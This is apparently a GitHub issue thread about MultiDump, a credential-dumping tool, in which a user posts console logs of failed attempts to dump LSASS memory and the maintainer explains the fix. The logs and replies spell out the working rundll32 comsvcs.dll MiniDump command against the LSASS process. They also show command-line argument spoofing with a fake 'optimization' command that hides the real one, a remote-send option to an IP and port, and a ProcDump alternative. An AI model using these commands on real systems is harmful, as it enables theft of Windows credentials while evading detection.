I can't seem to dump the password

[smxiazi]

\MultiDump-main\Release>MultiDump.exe -r xx.xx.xx.xx:9001

---

| \/ | | | |() \ _ _ | |\/| | | | | | | | | | | | | | ' ` | ' \ | | | | || | | || | || | || | | | | | | |) | || ||\,||_||___/ \,|| || || ._/ || [+] Found "lsass.exe" - Of PID : 696 [i] Dumping LSASS Using comsvcs.dll... [i] Target Process Created With Pid : 14196 [!] Failed to Locate LSASS Dump File!

[i] Trying to Dump LSASS Again... [i] Target Process Created With Pid : 12280 [!] Failed to Locate LSASS Dump File!

[i] Trying to Dump LSASS Again... [i] Target Process Created With Pid : 14160 [!] Failed to Locate LSASS Dump File!

[i] Trying to Dump LSASS Again... [i] Target Process Created With Pid : 8840 [!] Failed to Locate LSASS Dump File!

========== If you use the -REG mode, it works, but you cannot obtain the plaintext password.

[smxiazi]

[+] Found "lsass.exe" - Of PID : 696 [i] Real Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full [i] Dummy Command: C:\Windows\System32\rundll32.exe OpenOptimizationControlPanel /cleanup:tempfiles /defrag:all-drives /optimize:startup /schedule:daily /report:debug_file_process_info_20240805_064521.dmp

[i] Dumping LSASS Using comsvcs.dll... [i] Target Process Created With Pid : 10752 [i] Writing "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full" As The Process Argument At : 0x00AE04F6 ... [i] Updating The Length Of The Process Argument From 370 To 64 ...

[i] Reading Dump File and Zeroing Bytes... [i] Retry Count: 100000 [!] Failed to Locate LSASS Dump File! [i] LSASS is Running, Continuing...

[i] Trying to Dump LSASS Again... [i] Target Process Created With Pid : 3820 [i] Writing "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full" As The Process Argument At : 0x00CA04F6 ... [i] Updating The Length Of The Process Argument From 370 To 64 ...

[i] Reading Dump File and Zeroing Bytes... [i] Retry Count: 100000 [!] Failed to Locate LSASS Dump File! [i] LSASS is Running, Continuing...

[i] Trying to Dump LSASS Again... [i] Target Process Created With Pid : 11996 [i] Writing "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full" As The Process Argument At : 0x004404F6 ... [i] Updating The Length Of The Process Argument From 370 To 64 ...

[i] Reading Dump File and Zeroing Bytes... [i] Retry Count: 100000 [!] Failed to Locate LSASS Dump File! [i] LSASS is Running, Continuing...

[i] Trying to Dump LSASS Again... [i] Target Process Created With Pid : 13756 [i] Writing "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full" As The Process Argument At : 0x005804F6 ... [i] Updating The Length Of The Process Argument From 370 To 64 ...

[i] Reading Dump File and Zeroing Bytes... [i] Retry Count: 100000 [!] Failed to Locate LSASS Dump File! [i] LSASS is Running, Continuing...

[smxiazi]

I seem to know why, --reg mode can be run with cmd, but the default mode must be powershell

[Xre0uS]

Hey, just got around to take a look at this, thanks for pointing it out, didn't really test it with cmd :D

So the issue seems to be with the default method of dumping LSASS using rundll32.exe with comsvcs.dll, by default MutiDump is using something like this:

C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 720 C:\Users\MalTest\AppData\Local\Temp\iilodm.dmp full

Which works in powershell but not cmd. I have no idea why, probably because of the dumb way cmd parses the arguments.

If you have to use cmd, you can use it with --procdump which is the other dump method, it will have to write ProcDump.exe to disk of course.